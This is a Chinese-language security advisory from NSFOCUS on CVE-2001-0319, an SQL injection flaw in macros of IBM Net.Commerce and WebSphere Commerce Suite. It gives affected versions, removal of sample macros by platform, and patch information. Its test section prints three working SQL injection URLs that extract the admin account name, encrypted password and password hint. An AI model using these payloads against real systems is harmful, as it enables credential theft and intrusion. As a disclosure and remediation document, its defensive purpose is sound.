安全研究

安全漏洞
IBM Net.Commerce远程执行任意命令漏洞

发布日期:2001-02-05
更新日期:2001-02-05

受影响系统:
IBM Net.Commerce 3.0
IBM Net.Commerce 2.0
IBM Net.Commerce Hosting Server 3.2
IBM Net.Commerce Hosting Server 3.1.2
IBM Net.Commerce Hosting Server 3.1.1
IBM Net.Commerce Pro 3.2
IBM Net.Commerce Pro 3.1.2
IBM Net.Commerce Pro 3.1.1
IBM Net.Commerce Pro 3.1
IBM Net.Commerce Start 3.2
IBM Net.Commerce Start 3.1.2
IBM Net.Commerce Start 3.1.1
IBM Net.Commerce Start 3.1
IBM WebSphere Commerce Suite MarketPlace 4.1
IBM WebSphere Commerce Suite Pro 4.1.1
IBM WebSphere Commerce Suite Pro 4.1
IBM WebSphere Commerce Suite Service Provider 3.2
IBM WebSphere Commerce Suite Service Provider 3.1.2
IBM WebSphere Commerce Suite Start 4.1.1
IBM WebSphere Commerce Suite Start 4.1
不受影响系统:
IBM WebSphere Commerce Suite Pro 5.1
IBM WebSphere Commerce Suite Start 5.1
描述:
BUGTRAQ  ID: 2350
CVE(CAN) ID: CVE-2001-0319

Net.Commerce是IBM发行的Websphere的一部分。它提供了一些通用特性使电子商务变得更加容易,其性能和可靠性也有独到之处。

它默认支持的宏特性未对用户输入进行适当的检查,远程攻击者可以利用SQL Injection技术以帐号DB2INST1的权限执行任意SHELL命令。

IBM已经修正了随Net.Commerce 3.2、WebSphere Commerce Suite 4.1发布的有安全漏洞的宏,但是用户自定义宏可能存在同样的安全漏洞。WebSphere Commerce Suite 5.1不受此问题影响,它不使用Net.Data宏。


<*来源:rudi carell (rudicarell@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=98140167310183&w=2
        *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

rudi carell (rudicarell@hotmail.com)提供了如下测试方法:

提交如下URL请求可以获取administrator帐号权限

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

提交如下URL请求可以获取加密后的口令

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

提交如下URL请求可以获取口令提示

http://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

"orderdspc.d2w"并非惟一的存在安全漏洞的宏,上述URL请求仅仅是一部分例子,还有很多其它利用方法。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 按照如下步骤删除示例宏:

1. 在WEB根目录中找到每个实例对应的db2www.ini 。

2. 检查这些ini文件中的MACRO_PATH,确认只包含用到了的宏,删除示例宏。

3. 删除那些未被用到的目录。

下列目录包含了一些应该被删除的示例代码,如果您需要使用其中一些示例宏,务必仔细修改源码,对用户输入进行适当的检查。

Websphere Commerce Suite and Market Place Edition Version 4.1/4.1.1:

SUN Solaris

    /opt/WebSphere/CommerceSuite/macro/en_US/base
    /opt/WebSphere/CommerceSuite/macro/en_US/bus2bus
    /opt/WebSphere/CommerceSuite/macro/en_US/category
    /opt/WebSphere/CommerceSuite/macro/en_US/demomall
    /opt/WebSphere/CommerceSuite/macro/en_US/euromall
    /opt/WebSphere/CommerceSuite/macro/en_US/grocery
    /opt/WebSphere/CommerceSuite/macro/en_US/product
    /opt/WebSphere/CommerceSuite/macro/en_US/tutorial
    /opt/WebSphere/CommerceSuite/models

IBM AIX

    /usr/lpp/CommerceSuite/macro/en_US/base
    /usr/lpp/CommerceSuite/macro/en_US/bus2bus
    /usr/lpp/CommerceSuite/macro/en_US/category
    /usr/lpp/CommerceSuite/macro/en_US/demomall
    /usr/lpp/CommerceSuite/macro/en_US/euromall
    /usr/lpp/CommerceSuite/macro/en_US/grocery
    /usr/lpp/CommerceSuite/macro/en_US/product
    /usr/lpp/CommerceSuite/macro/en_US/tutorial /usr/lpp/CommerceSuite/models

Windows NT

    IBM\CommerceSuite\macro\en_US\base IBM\CommerceSuite\macro\en_US\bus2bus
    IBM\CommerceSuite\macro\en_US\category
    IBM\CommerceSuite\macro\en_US\demomall
    IBM\CommerceSuite\macro\en_US\euromall
    IBM\CommerceSuite\macro\en_US\grocery IBM\CommerceSuite\macro\en_US\product
    IBM\CommerceSuite\macro\en_US\ncsample
    IBM\CommerceSuite\macro\en_US\tutorial
    IBM\CommerceSuite\models IBM\CommerceSuite\instance\<instancename>\teditor

Net.Commerce/Service Provider Edition Version 3.2

SUN Solaris

    /opt/IBMnetc/NetCommerce3/macro/en_US/bus2bus
    /opt/IBMnetc/NetCommerce3/macro/en_US/category
    /opt/IBMnetc/NetCommerce3/macro/en_US/demomall
    /opt/IBMnetc/NetCommerce3/macro/en_US/euromall
    /opt/IBMnetc/NetCommerce3/macro/en_US/grocery
    /opt/IBMnetc/NetCommerce3/macro/en_US/ncsample
    /opt/IBMnetc/NetCommerce3/macro/en_US/product
    /opt/IBMnetc/NetCommerce3/macro/en_US/tutorial

IBM AIX

    /usr/lpp/NetCommerce3/macro/en_US/bus2bus
    /usr/lpp/NetCommerce3/macro/en_US/category
    /usr/lpp/NetCommerce3/macro/en_US/demomall
    /usr/lpp/NetCommerce3/macro/en_US/euromall
    /usr/lpp/NetCommerce3/macro/en_US/grocery
    /usr/lpp/NetCommerce3/macro/en_US/ncsample
    /usr/lpp/NetCommerce3/macro/en_US/product
    /usr/lpp/NetCommerce3/macro/en_US/tutorial

Windows NT

    IBM\NetCommerce3\macro\en_US\bus2bus IBM\NetCommerce3\macro\en_US\category
    IBM\NetCommerce3\macro\en_US\demomall IBM\NetCommerce3\macro\en_US\euromall
    IBM\NetCommerce3\macro\en_US\grocery IBM\NetCommerce3\macro\en_US\ncsample
    IBM\NetCommerce3\macro\en_US\product IBM\NetCommerce3\macro\en_US\tutorial

厂商补丁:

IBM
---
IBM已经为此发布了一个安全公告(MSS-OAR-E01-2001:087)以及相应补丁:
MSS-OAR-E01-2001:087:Re: Passwords in Net.Commerce/WebSphere decryptable, any version

IBM已经修正了该漏洞,参看
http://www-4.ibm.com/software/webservers/commerce/netcomletter.html

升级到不受此问题影响的版本,至少应该升级到Net.Commerce 3.2,它修补了管理宏,删除了一些示例宏。

浏览次数:3846
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客